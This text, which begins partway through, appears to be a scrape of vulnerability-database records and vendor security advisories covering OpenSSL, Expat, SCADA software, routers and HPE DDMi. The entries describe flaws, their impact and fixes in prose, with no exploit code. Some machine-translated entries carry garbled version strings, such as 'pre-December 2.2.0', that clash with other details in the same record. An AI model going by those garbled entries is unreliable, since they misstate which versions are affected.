increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect DTLS users.
OpenSSL 1.1.0 TLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Excessive allocation of memory in dtls1_preprocess_fragment() (CVE-2016-6308)
=============================================================================
Severity: Low
This issue is very similar to CVE-2016-6307. The underlying defect is different
but the security analysis and impacts are the same except that it impacts DTLS.
A DTLS message includes 3 bytes for its length in the header for the message.
This would allow for messages up to 16Mb in length. Messages of this length are
excessive and OpenSSL includes a check to ensure that a peer is sending
reasonably sized messages in order to avoid too much memory being consumed to
service a connection. A flaw in the logic of version 1.1.0 means that memory for
the message is allocated too early, prior to the excessive message length
check. Due to way memory is allocated in OpenSSL this could mean an attacker
could force up to 21Mb to be allocated to service a connection. This could lead
to a Denial of Service through memory exhaustion. However, the excessive message
length check still takes place, and this would cause the connection to
immediately fail. Assuming that the application calls SSL_free() on the failed
conneciton in a timely manner then the 21Mb of allocated memory will then be
immediately freed again. Therefore the excessive memory allocation will be
transitory in nature. This then means that there is only a security impact if:
1) The application does not call SSL_free() in a timely manner in the
event that the connection fails
or
2) The application is working in a constrained environment where there
is very little free memory
or
3) The attacker initiates multiple connection attempts such that there
are multiple connections in a state where memory has been allocated for
the connection; SSL_free() has not yet been called; and there is
insufficient memory to service the multiple requests.
Except in the instance of (1) above any Denial Of Service is likely to
be transitory because as soon as the connection fails the memory is
subsequently freed again in the SSL_free() call. However there is an
increased risk during this period of application crashes due to the lack
of memory - which would then mean a more serious Denial of Service.
This issue does not affect TLS users.
OpenSSL 1.1.0 DTLS users should upgrade to 1.1.0a
This issue was reported to OpenSSL on 18th September 2016 by Shi Lei (Gear Team,
Qihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL
development team.
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/policies/releasestrat.html), support for OpenSSL
version 1.0.1 will cease on 31st December 2016. No security updates for that
version will be provided after that date. Users of 1.0.1 are advised to
upgrade.
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those
versions are no longer receiving security updates.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv/20160922.txt
Note: the online version of the advisory may be updated with additional details
over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/policies/secpolicy.html
VAR-201606-0135 | CVE-2016-5300 | Expat XML Parser Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
The XML parser in Expat does not use sufficient entropy for hash initialization, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted identifiers in an XML document. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0876. The Expat library is prone to a remote denial-of-service vulnerability.
Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an application using the vulnerable XML parsing library.
Note : This issue is the result of an incomplete fix for the CVE-2012-0876 described in 52379 (Expat XML Parsing Multiple Remote Denial of Service Vulnerabilities). From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Message-ID: <57683228.8060901@canonical.com>
Subject: [USN-3013-1] XML-RPC for C and C++ vulnerabilities
============================================================================
Ubuntu Security Notice USN-3013-1
June 20, 2016
xmlrpc-c vulnerabilities
============================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in XML-RPC for C and C++.
Software Description:
- xmlrpc-c: Lightweight RPC library based on XML and HTTP
Details:
It was discovered that the Expat code in XML-RPC for C and C++ unexpectedly
called srand in certain circumstances. This could reduce the security of
calling applications. (CVE-2012-6702)
It was discovered that the Expat code in XML-RPC for C and C++ incorrectly
handled seeding the random number generator. A remote attacker could
possibly use this issue to cause a denial of service. (CVE-2016-5300)
Gustavo Grieco discovered that the Expat code in XML-RPC for C and C++
incorrectly handled malformed XML data. (CVE-2016-0718)
It was discovered that the Expat code in XML-RPC for C and C++ incorrectly
handled malformed XML data.
(CVE-2015-1283, CVE-2016-4472)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 LTS:
libxmlrpc-c++4 1.16.33-3.1ubuntu5.2
libxmlrpc-core-c3 1.16.33-3.1ubuntu5.2
After a standard system upgrade you need to restart any applications linked
against XML-RPC for C and C++ to effect the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3013-1
CVE-2012-6702, CVE-2015-1283, CVE-2016-0718, CVE-2016-4472,
CVE-2016-5300
Package Information:
https://launchpad.net/ubuntu/+source/xmlrpc-c/1.16.33-3.1ubuntu5.2
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
- -------------------------------------------------------------------------
Debian Security Advisory DSA-3597-1 security@debian.org
https://www.debian.org/security/ Luciano Bello
June 07, 2016 https://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : expat
CVE ID : CVE-2012-6702 CVE-2016-5300
Two related issues have been discovered in Expat, a C library for parsing
XML. Stefan Sørensen
discovered that the use of the function XML_Parse() seeds the random
number generator generating repeated outputs for rand() calls.
CVE-2016-5300
It is the product of an incomplete solution for CVE-2012-0876.
You might need to manually restart programs and services using expat
libraries.
For the stable distribution (jessie), these problems have been fixed in
version 2.1.0-6+deb8u3.
For the unstable distribution (sid), these problems have been fixed in
version 2.1.1-3.
We recommend that you upgrade your expat packages.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201701-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Expat: Multiple vulnerabilities
Date: January 11, 2017
Bugs: #458742, #555642, #577928, #583268, #585510
ID: 201701-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Expat, the worst of which
may allow execution of arbitrary code.
Background
==========
Expat is a set of XML parsing libraries.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/expat < 2.2.0-r1 >= 2.2.0-r1
Description
===========
Multiple vulnerabilities have been discovered in Expat. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker, by enticing a user to process a specially crafted
XML file, could execute arbitrary code with the privileges of the
process or cause a Denial of Service condition. This attack could also
be used against automated systems that arbitrarily process XML files.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Expat users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/expat-2.2.0-r1"
References
==========
[ 1 ] CVE-2012-6702
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-6702
[ 2 ] CVE-2013-0340
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0340
[ 3 ] CVE-2015-1283
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1283
[ 4 ] CVE-2016-0718
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0718
[ 5 ] CVE-2016-4472
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4472
[ 6 ] CVE-2016-5300
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5300
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201701-21
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-03-28-2 Additional information for
APPLE-SA-2017-03-22-1 iTunes for Windows 12.6
iTunes for Windows 12.6 addresses the following:
APNs Server
Available for: Windows 7 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A client certificate was sent in plaintext. This issue
was addressed through improved certificate handling.
CVE-2017-2383: Matthias Wachs and Quirin Scheitle of Technical
University Munich (TUM)
Entry added March 28, 2017
iTunes
Available for: Windows 7 and later
Impact: Multiple issues in SQLite
Description: Multiple issues existed in SQLite. These issues were
addressed by updating SQLite to version 3.15.2. These issues were
addressed by updating expat to version 2.2.0.
CVE-2009-3270
CVE-2009-3560
CVE-2009-3720
CVE-2012-1147
CVE-2012-1148
CVE-2012-6702
CVE-2015-1283
CVE-2016-0718
CVE-2016-4472
CVE-2016-5300
libxslt
Available for: Windows 7 and later
Impact: Multiple vulnerabilities in libxslt
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-5029: Holger Fuhrmannek
Entry added March 28, 2017
WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed through
improved memory handling.
CVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab
(tencent.com) working with Trend Micro's Zero Day Initiative
Entry added March 28, 2017
WebKit
Available for: Windows 7 and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in element handling. This
issue was addressed through improved validation.
CVE-2017-2479: lokihardt of Google Project Zero
CVE-2017-2480: lokihardt of Google Project Zero
Entry added March 28, 2017
Installation note:
iTunes for Windows 12.6 may be obtained from:
https://www.apple.com/itunes/download/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCgAGBQJY2sl6AAoJEIOj74w0bLRGEMAQAJjPU9+iTIEs0o4EfazvmkXj
/zLRgzdfr1kp9Iu90U/ZxgnAO3ZUqEF/6FWy6dN3zSA7AlP7q+zFlxXqbkoJB+eX
sE+vGilHWZ8p2Qud9EikwDKCvLNn/4xYQ9Nm0jCwA14VBS1dBlOrFUlsnM9EoS9/
YKks/NSYV9jtLgKvc42SeTks62tLL5ZQGMKv+Gg0HH2Yeug2eAHGb+u5vYCHTcER
AMTKKQtr57IJyz2tg7YZGWvbKIS2690CpIyZGxpbUCKv+dNdEPsDTNHjjpzwMBtc
diSIIX8AC6T0nWbrOFtWqhhFyWk6rZAWb8RvDYYd/a6ro7hxYq8xZATBS2BJFskp
esMHBuFYgDwIeJiGaCW07UyJzyzDck7pesJeq7gqF+O5Fl6bdHN4b8rNmVtBvDom
g7tkwSE9+ZmiPUMJGF2NUWNb4+yY0OPm3Uq2kvoyXl5KGmEaFMoDnPzKIdPmE+b+
lJZUYgQSXlO6B7uz+MBx2ntH1uhIrAdKhFiePYj/lujNB3lTij5zpCOLyivdEXZw
iJHX211+FpS8VV1/dHOjgbYnvnw4wofbPN63dkYvwgwwWy7VISThXQuMqtDW/wOE
9h0me2NkZRxQ845p4MaLPqZQFi1WcU4/PbcBBb0CvBwlnonYP/YRnyQrNWx+36Fo
VkUmhXDNi0csm+QTi7ZP
=hPjT
-----END PGP SIGNATURE-----
VAR-201606-0254 | CVE-2016-4523 | Trihedral VTScada Buffer Overflow Vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
The WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via unspecified vectors. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Trihedral VTScada. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to traverse user-supplied paths. An attacker can leverage this vulnerability to execute code under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. A buffer overflow vulnerability exists in the WAP interface of Trihedral VTScada 8 and pre-1.0.2. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201606-0247 | CVE-2016-4510 | Trihedral VTScada Authorization Issue Vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
The WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to bypass authentication and read arbitrary files via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to properly validate user-supplied filenames. An attacker can leverage this vulnerability to disclose the contents of arbitrary files under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. An authorization vulnerability exists in the WAP interface of Trihedral VTScada 8 and pre-December 2.2.0. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201611-0179 | CVE-2016-7160 | Samsung Mobile Service disruption on devices (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
A vulnerability on Samsung Mobile M(6.0) devices exists because external access to SystemUI activities is not properly restricted, leading to a SystemUI crash and device restart, aka SVE-2016-6248. Vendors have confirmed this vulnerability SVE-2016-6248 It is released as. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. http://cwe.mitre.org/data/definitions/476.htmlService operation interruption (SystemUI Crash and device restart ) There is a possibility of being put into a state. SamsungMobile is a series of smart mobile devices released by South Korea's Samsung. The Samsung MobileL 5.0 and 5.1 and M6.0 devices use the Exynos 7420 chipset for a denial of service vulnerability. An attacker could exploit the vulnerability to cause a denial of service
VAR-201606-0244 | CVE-2016-4494 | KMC Controls BAC-5051E Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
Cross-site request forgery (CSRF) vulnerability on KMC Controls BAC-5051E devices with firmware before E0.2.0.2 allows remote attackers to hijack the authentication of unspecified victims for requests that disclose the contents of a configuration file. KMCControlsBAC-5051E is a router product used in building automation systems by KMC Controls, USA. KMC Controls BAC-5051E router is prone to the following security vulnerabilities:
1. An information-disclosure vulnerability
2. A cross-site Request-forgery vulnerability
An attacker can exploit these issues to obtain potentially sensitive information and perform unauthorized administrative actions. Other attacks are also possible.
Versions prior to BAC-5051E E0.2.0.2 are vulnerable
VAR-201606-0245 | CVE-2016-4495 | KMC Controls BAC-5051E Vulnerability that bypasses access restrictions in device firmware |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
KMC Controls BAC-5051E devices with firmware before E0.2.0.2 allow remote attackers to bypass intended access restrictions and read a configuration file via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. KMCControlsBAC-5051E is a router product used in building automation systems by KMC Controls, USA. A security vulnerability exists in KMCControlsBAC-5051E with firmware prior to E0.2.0.2. KMC Controls BAC-5051E router is prone to the following security vulnerabilities:
1. An information-disclosure vulnerability
2. A cross-site Request-forgery vulnerability
An attacker can exploit these issues to obtain potentially sensitive information and perform unauthorized administrative actions. Other attacks are also possible.
Versions prior to BAC-5051E E0.2.0.2 are vulnerable
VAR-201606-0550 | No CVE | Fei Xun K2 wireless router exists unauthorized password modification vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Fixon K2 wireless router is a wireless router for home use.
The Fixon K2 wireless router has an unauthorized password modification vulnerability. Allowing an attacker to exploit this vulnerability without having to log in to the management background can directly submit a packet request to modify the username and password, thereby modifying the username and password.
VAR-201606-0551 | No CVE | AB CompactLogix 5000 Series Controller CIP Protocol Denial of Service Vulnerability |
CVSS V2: 4.9 CVSS V3: - Severity: MEDIUM |
The AB CompactLogix 5000 series is a controller for Logix solutions for low-end to mid-range applications.
The CIP communication protocol of the AB CompactLogix 5000 series controller has vulnerabilities. After the vulnerability is successfully exploited, the target device cannot normally respond to some CIP function code requests. All Ethernet monitoring data collection or control instruction distribution that relies on these function codes will fail. Normal work seriously affects on-site production.
VAR-201606-0456 | CVE-2016-5365 | Huawei Honor WS851 Router software stack-based buffer overflow vulnerability |
CVSS V2: 10.0 CVSS V3: 9.8 Severity: CRITICAL |
Stack-based buffer overflow in Huawei Honor WS851 routers with software 1.1.21.1 and earlier allows remote attackers to execute arbitrary commands with root privileges via unspecified vectors, aka HWPSIRT-2016-05051. Huawei Honor WS851 The router software contains a stack-based buffer overflow vulnerability. Vendors have confirmed this vulnerability HWPSIRT-2016-05051 It is released as.By a third party root An arbitrary command may be executed with authority. HuaweiWS851 is a wireless router product from China's Huawei company. A security vulnerability exists in versions prior to HuaweiWS8511.1.21.1 that caused the program to fail to check parameters. An attacker could exploit this vulnerability to trigger a stack overflow, remotely gain root privileges, and execute the shell.
Attackers may be able to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Huawei Honor WS851 Routers running firmware versions 1.1.21.1 and prior are vulnerable
VAR-201606-0458 | CVE-2016-5367 | Huawei Honor WS851 Vulnerability to obtain important information in router software |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Huawei Honor WS851 routers with software 1.1.21.1 and earlier allow remote attackers to obtain sensitive information via unspecified vectors, aka HWPSIRT-2016-05053. Huawei Honor WS851 There is a vulnerability in the router software that can capture important information. Vendors have confirmed this vulnerability HWPSIRT-2016-05053 It is released as.Important information may be obtained by a third party. HuaweiWS851 is a wireless router product from China's Huawei company. A security vulnerability exists in versions prior to HuaweiWS8511.1.21.1 that caused the program to fail to validate parameters.
Huawei Honor WS851 firmware 1.1.21.1 and prior are vulnerable
VAR-201606-0260 | CVE-2016-4532 | Trihedral VTScada Directory Traversal Vulnerability |
CVSS V2: 6.4 CVSS V3: 9.1 Severity: CRITICAL |
Directory traversal vulnerability in the WAP interface in Trihedral VTScada (formerly VTS) 8.x through 11.x before 11.2.02 allows remote attackers to read arbitrary files via a crafted pathname. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Trihedral VTScada. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of Wireless Application Protocol requests. The issue lies in the failure to properly restrict the path from which images are retrieved. An attacker can leverage this vulnerability to disclose the contents of arbitrary files under the context of the user running the service. Trihedral VTScada (formerly known as VTS) is a SCADA system based on the Windows platform provided by Trihedral Engineering of Canada. VTScada is prone to multiple security vulnerabilities.
Exploiting these issues will allow attackers to obtain sensitive information, cause denial-of-service conditions or to bypass certain security restrictions and perform unauthorized actions.
VTScada versions 8 through 11.2.x are vulnerable
VAR-201606-0274 | CVE-2016-1418 | plural Cisco Aironet In access point software Linux of root Vulnerability to gain access |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
Cisco Aironet Access Point Software 8.2(100.0) on 1830e, 1830i, 1850e, 1850i, 2800, and 3800 access points allows local users to obtain Linux root access via crafted CLI command parameters, aka Bug ID CSCuy64037. The Cisco Aironet 1800/2800/3800 Series AccessPoint is a small to medium wireless network access point product. A security vulnerability exists in the command line interpreter for Cisco Aironet 1800/2800/3800 Series AccessPoint.
This issue being tracked by Cisco Bug ID CSCuy64037
VAR-201606-0410 | CVE-2016-4369 | HPE Discovery and Dependency Mapping Inventory Vulnerabilities in arbitrary command execution |
CVSS V2: 6.5 CVSS V3: 8.8 Severity: HIGH |
HPE Discovery and Dependency Mapping Inventory (DDMi) 9.30, 9.31, 9.32, 9.32 update 1, 9.32 update 2, and 9.32 update 3 allows remote authenticated users to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library. Supplementary information : CWE Vulnerability types by CWE-284: Improper Access Control ( Improper access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlCleverly serialized by a remotely authenticated user Java Arbitrary commands may be executed via the object. HP Discovery and Dependency Mapping Inventory is prone to a remote code-execution vulnerability.
Successfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts may result in a denial-of-service condition.
HP Discovery and Dependency Mapping Inventory 9.30, 9.31, 9.32, 9.32 update 1, 9.32 update 2, and 9.32 update 3 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n
a-c05164819
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05164819
Version: 1
HPSBGN03619 rev.1 - HPE Discovery and Dependency Mapping Inventory (DDMi)
using Java Deserialization, remote Code Execution
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible. The vulnerability could be exploited remotely to allow
remote code execution.
References:
CVE-2016-4369
CERT-VU#576313
SSRT110134
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP DDMI Inventory Software Series 9.30, 9.31, 9.32, 9.32 update 1, 9.32
update 2, and 9.32 update 3
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2016-4369 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE has made the following mitigation information available to resolve the
vulnerability for the impacted versions of Discovery and Dependency Mapping
Inventory (DDMi):
https://softwaresupport.hpe.com/group/softwaresupport/search-result/-/facetse
arch/document/KM02338864
HISTORY
Version:1 (rev.1) - 6 June 2016 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported
product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQEcBAEBAgAGBQJXVe/zAAoJEGIGBBYqRO9/XyYH/RN+luVOrPp2TmbmuY3oj4mQ
oL/EyarFFRjjosIZVchsLuvhTXoE3BvMuzkmKL3aV9ScZjbEAf9h6jE289iicrvE
Mi0JmerxIvfR0q8+3JirBjY/invDj6y/5WdHf3s/F9M5rQSKsJRv6k52RKeEVjtu
fG1pwPHA/5fRGBoNpKpjaOVbkMkACqm7NmTFS9isYIsB1xMH41vjSbS5c1MTAhRb
Elx7Zzy4nKXRDIlDoZwD6WaZ9rBZUS680lUZziOpxvD9liWQ+N1GPXI9Y5xDxFEs
ngfRbETxVqomNwTIvoxWfGkUSGxXRZsDqIndOXeiIN+SlEnVSZqM8ISjaJo7MQw=
=80Bg
-----END PGP SIGNATURE-----